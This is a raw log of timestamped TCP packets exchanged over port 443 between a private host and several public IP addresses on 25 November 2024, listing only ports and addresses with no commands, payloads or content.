Nov 25, 2024 11:33:52.099082947 CET	443	49817	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:52.101164103 CET	49823	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:52.101201057 CET	443	49823	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:52.101277113 CET	49823	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:52.101434946 CET	49823	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:52.101452112 CET	443	49823	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:52.199492931 CET	49824	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:52.199523926 CET	443	49824	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:52.199599028 CET	49824	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:52.199846029 CET	49824	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:52.199860096 CET	443	49824	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:52.910703897 CET	443	49818	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:52.910775900 CET	443	49818	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:52.910784006 CET	49818	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:52.910820961 CET	49818	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:52.911627054 CET	49818	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:52.911640882 CET	443	49818	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:53.203337908 CET	49825	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:53.203373909 CET	443	49825	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:53.203452110 CET	49825	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:53.203644037 CET	49825	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:53.203659058 CET	443	49825	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:53.474299908 CET	443	49819	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:53.474916935 CET	49819	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:53.474937916 CET	443	49819	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:53.476974010 CET	49819	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:53.476979017 CET	443	49819	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:53.649837017 CET	443	49824	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:53.650002003 CET	49824	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:53.650388002 CET	49824	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:53.650397062 CET	443	49824	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:53.652156115 CET	49824	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:53.652160883 CET	443	49824	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:53.652299881 CET	49824	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:53.652314901 CET	443	49824	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:53.652364016 CET	49824	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:53.652368069 CET	443	49824	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:53.652401924 CET	49824	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:53.652414083 CET	443	49824	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:53.652493954 CET	49824	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:53.652501106 CET	443	49824	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:53.652528048 CET	49824	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:53.652539015 CET	443	49824	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:53.652815104 CET	49824	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:53.652822971 CET	443	49824	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:53.652853966 CET	49824	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:53.652863026 CET	443	49824	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:53.652870893 CET	49824	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:53.652874947 CET	443	49824	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:53.652885914 CET	49824	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:53.652903080 CET	443	49824	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:53.652909994 CET	49824	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:53.652920008 CET	443	49824	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:53.652961016 CET	49824	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:53.652971029 CET	443	49824	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:53.652991056 CET	49824	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:53.653002024 CET	443	49824	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:53.682290077 CET	443	49821	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:53.682912111 CET	49821	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:53.682929039 CET	443	49821	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:53.683535099 CET	49821	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:53.683542013 CET	443	49821	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:53.693284988 CET	443	49822	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:53.693777084 CET	49822	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:53.693789005 CET	443	49822	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:53.694360971 CET	49822	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:53.694365978 CET	443	49822	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:53.798054934 CET	443	49820	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:53.807452917 CET	49820	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:53.807466984 CET	443	49820	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:53.815258980 CET	49820	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:53.815262079 CET	443	49820	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:53.883116961 CET	443	49823	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:53.924129963 CET	443	49819	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:53.924153090 CET	443	49819	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:53.924201965 CET	443	49819	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:53.924268007 CET	49819	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:53.930455923 CET	49823	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.034996033 CET	49823	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.035012960 CET	443	49823	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.035526037 CET	49823	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.035531044 CET	443	49823	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.035851002 CET	49819	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.035873890 CET	443	49819	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.035883904 CET	49819	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.035891056 CET	443	49819	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.039165974 CET	49826	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.039203882 CET	443	49826	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.039288044 CET	49826	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.039405107 CET	49826	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.039421082 CET	443	49826	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.123018026 CET	443	49821	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.123095989 CET	443	49821	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.123141050 CET	49821	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.125510931 CET	49821	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.125525951 CET	443	49821	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.125535965 CET	49821	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.125545025 CET	443	49821	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.132189989 CET	443	49822	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.132246971 CET	443	49822	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.132324934 CET	49822	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.132335901 CET	443	49822	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.133044958 CET	49822	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.133057117 CET	443	49822	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.133178949 CET	49822	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.133431911 CET	443	49822	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.133521080 CET	443	49822	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.133744955 CET	49822	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.136565924 CET	49827	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.136619091 CET	443	49827	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.136718988 CET	49827	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.142261028 CET	49828	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.142281055 CET	443	49828	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.142450094 CET	49827	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.142478943 CET	49828	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.142479897 CET	443	49827	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.142560959 CET	49828	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.142570972 CET	443	49828	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.252196074 CET	443	49820	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.252250910 CET	443	49820	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.252482891 CET	49820	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.253034115 CET	49820	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.253043890 CET	443	49820	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.253138065 CET	49820	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.253143072 CET	443	49820	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.258491039 CET	49829	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.258534908 CET	443	49829	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.258600950 CET	49829	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.263237000 CET	49829	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.263248920 CET	443	49829	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.366506100 CET	443	49823	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.366524935 CET	443	49823	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.366596937 CET	49823	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.366605997 CET	443	49823	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.366691113 CET	49823	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.369632959 CET	443	49823	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.369677067 CET	443	49823	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.369999886 CET	49823	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.373081923 CET	49823	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.373095036 CET	443	49823	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.373106003 CET	49823	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.373111010 CET	443	49823	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.380033016 CET	49830	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.380055904 CET	443	49830	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.380111933 CET	49830	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.384998083 CET	49830	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:54.385011911 CET	443	49830	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:54.648617029 CET	443	49825	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:54.648722887 CET	49825	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:54.658411026 CET	49825	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:54.658421993 CET	443	49825	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:54.660067081 CET	49825	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:54.660072088 CET	443	49825	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:55.068686008 CET	49831	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:55.068727970 CET	443	49831	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:55.068809986 CET	49831	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:55.069185972 CET	49831	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:55.069209099 CET	443	49831	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:55.578440905 CET	443	49824	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:55.578514099 CET	49824	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:55.578528881 CET	443	49824	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:55.578576088 CET	49824	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:55.607409000 CET	49824	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:55.607420921 CET	443	49824	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:55.782952070 CET	443	49825	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:55.783001900 CET	49825	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:55.783021927 CET	443	49825	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:55.783035994 CET	443	49825	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:55.783082962 CET	49825	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:55.840821981 CET	443	49826	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:55.877912045 CET	443	49828	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:55.881414890 CET	49826	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:55.925607920 CET	443	49827	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:55.931720972 CET	49828	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:55.968122959 CET	49827	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.044054031 CET	443	49829	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.085810900 CET	49829	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.145462036 CET	49825	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:56.145483971 CET	443	49825	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:56.147994995 CET	49826	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.148015976 CET	443	49826	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.154129028 CET	49826	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.154134989 CET	443	49826	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.160273075 CET	49828	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.160286903 CET	443	49828	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.160690069 CET	49828	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.160696030 CET	443	49828	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.163650036 CET	49827	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.163693905 CET	443	49827	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.164154053 CET	49827	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.164180994 CET	443	49827	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.166313887 CET	443	49830	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.183726072 CET	49830	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.183733940 CET	443	49830	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.188554049 CET	49830	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.188559055 CET	443	49830	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.237955093 CET	49829	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.237972021 CET	443	49829	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.238521099 CET	49829	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.238527060 CET	443	49829	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.476564884 CET	443	49828	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.480657101 CET	443	49828	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.482129097 CET	49828	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.489546061 CET	443	49827	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.492530107 CET	443	49827	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.492600918 CET	49827	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.508418083 CET	443	49826	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.508454084 CET	443	49826	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.508511066 CET	49826	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.508527040 CET	443	49826	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.509531975 CET	443	49826	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.509637117 CET	49826	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.548995018 CET	49828	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.549001932 CET	443	49828	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.549045086 CET	49828	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.549050093 CET	443	49828	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.554828882 CET	49827	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.554828882 CET	49827	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.554893017 CET	443	49827	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.554920912 CET	443	49827	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.566510916 CET	443	49829	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.569607973 CET	443	49829	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.569966078 CET	49829	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.598624945 CET	49826	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.598640919 CET	443	49826	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.598654032 CET	49826	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.598658085 CET	443	49826	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.610307932 CET	443	49830	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.613233089 CET	443	49830	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:56.613286972 CET	49830	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:56.825824022 CET	443	49831	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:56.825974941 CET	49831	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:57.089565992 CET	49829	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:57.089596033 CET	443	49829	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:57.100645065 CET	49830	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:57.100668907 CET	443	49830	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:57.100680113 CET	49830	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:57.100689888 CET	443	49830	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:57.112096071 CET	49831	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:57.112138987 CET	443	49831	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:57.112481117 CET	443	49831	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:57.126497030 CET	49831	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:57.171374083 CET	443	49831	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:57.194709063 CET	49838	443	192.168.2.5	94.245.104.56
Nov 25, 2024 11:33:57.194717884 CET	443	49838	94.245.104.56	192.168.2.5
Nov 25, 2024 11:33:57.194863081 CET	49838	443	192.168.2.5	94.245.104.56
Nov 25, 2024 11:33:57.231359005 CET	49838	443	192.168.2.5	94.245.104.56
Nov 25, 2024 11:33:57.231370926 CET	443	49838	94.245.104.56	192.168.2.5
Nov 25, 2024 11:33:57.357341051 CET	49839	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:57.357362986 CET	443	49839	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:57.357517958 CET	49839	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:57.471179008 CET	49840	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:57.471213102 CET	443	49840	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:57.471333027 CET	49840	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:57.471615076 CET	49841	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:57.471651077 CET	443	49841	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:57.471898079 CET	49841	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:57.472604990 CET	49839	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:57.472626925 CET	443	49839	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:57.474320889 CET	49842	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:57.474343061 CET	443	49842	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:57.474473953 CET	49842	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:57.474530935 CET	49842	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:57.474544048 CET	443	49842	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:57.635060072 CET	49840	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:57.635083914 CET	443	49840	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:57.640206099 CET	49841	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:57.640219927 CET	443	49841	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:57.643331051 CET	49843	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:57.643341064 CET	443	49843	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:57.643399954 CET	49843	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:57.643532038 CET	49843	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:57.643542051 CET	443	49843	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:57.812915087 CET	443	49831	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:57.812948942 CET	443	49831	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:57.812966108 CET	443	49831	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:57.813023090 CET	49831	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:57.813036919 CET	443	49831	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:57.813080072 CET	49831	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:57.848647118 CET	443	49831	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:57.848684072 CET	443	49831	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:57.848706961 CET	49831	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:57.848714113 CET	443	49831	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:57.848740101 CET	443	49831	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:57.848773956 CET	49831	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:57.848798990 CET	49831	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:57.922055006 CET	49831	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:57.922063112 CET	443	49831	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:57.922072887 CET	49831	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:57.922076941 CET	443	49831	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:58.751601934 CET	49845	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:33:58.751619101 CET	443	49845	20.190.147.1	192.168.2.5
Nov 25, 2024 11:33:58.751688957 CET	49845	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:33:58.755381107 CET	49845	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:33:58.755392075 CET	443	49845	20.190.147.1	192.168.2.5
Nov 25, 2024 11:33:59.024748087 CET	443	49838	94.245.104.56	192.168.2.5
Nov 25, 2024 11:33:59.026823044 CET	49838	443	192.168.2.5	94.245.104.56
Nov 25, 2024 11:33:59.026833057 CET	443	49838	94.245.104.56	192.168.2.5
Nov 25, 2024 11:33:59.027993917 CET	443	49838	94.245.104.56	192.168.2.5
Nov 25, 2024 11:33:59.028052092 CET	49838	443	192.168.2.5	94.245.104.56
Nov 25, 2024 11:33:59.029382944 CET	49838	443	192.168.2.5	94.245.104.56
Nov 25, 2024 11:33:59.029449940 CET	443	49838	94.245.104.56	192.168.2.5
Nov 25, 2024 11:33:59.029542923 CET	49838	443	192.168.2.5	94.245.104.56
Nov 25, 2024 11:33:59.029548883 CET	443	49838	94.245.104.56	192.168.2.5
Nov 25, 2024 11:33:59.197997093 CET	49838	443	192.168.2.5	94.245.104.56
Nov 25, 2024 11:33:59.203879118 CET	443	49839	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:59.220774889 CET	49839	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:59.220794916 CET	443	49839	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:59.221311092 CET	49839	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:59.221314907 CET	443	49839	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:59.259160995 CET	443	49842	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:59.299000978 CET	49842	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:59.387118101 CET	49842	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:59.387130976 CET	443	49842	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:59.387701988 CET	49842	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:59.387706995 CET	443	49842	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:59.491187096 CET	443	49840	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:59.491859913 CET	443	49843	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:59.492516041 CET	443	49841	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:59.536094904 CET	49840	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:59.638823986 CET	443	49839	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:59.642411947 CET	443	49839	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:59.644030094 CET	49839	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:59.696465015 CET	49843	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:59.699368954 CET	443	49841	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:59.699440002 CET	49841	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:59.699462891 CET	49841	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:59.711941004 CET	443	49842	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:59.715167999 CET	443	49842	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:59.715471983 CET	49842	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:59.935937881 CET	49840	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:59.935950041 CET	443	49840	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:59.936691046 CET	49840	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:59.936695099 CET	443	49840	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:59.936888933 CET	49842	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:59.936898947 CET	443	49842	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:59.936909914 CET	49842	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:59.936913967 CET	443	49842	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:59.938811064 CET	49843	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:59.938847065 CET	443	49843	13.107.246.63	192.168.2.5
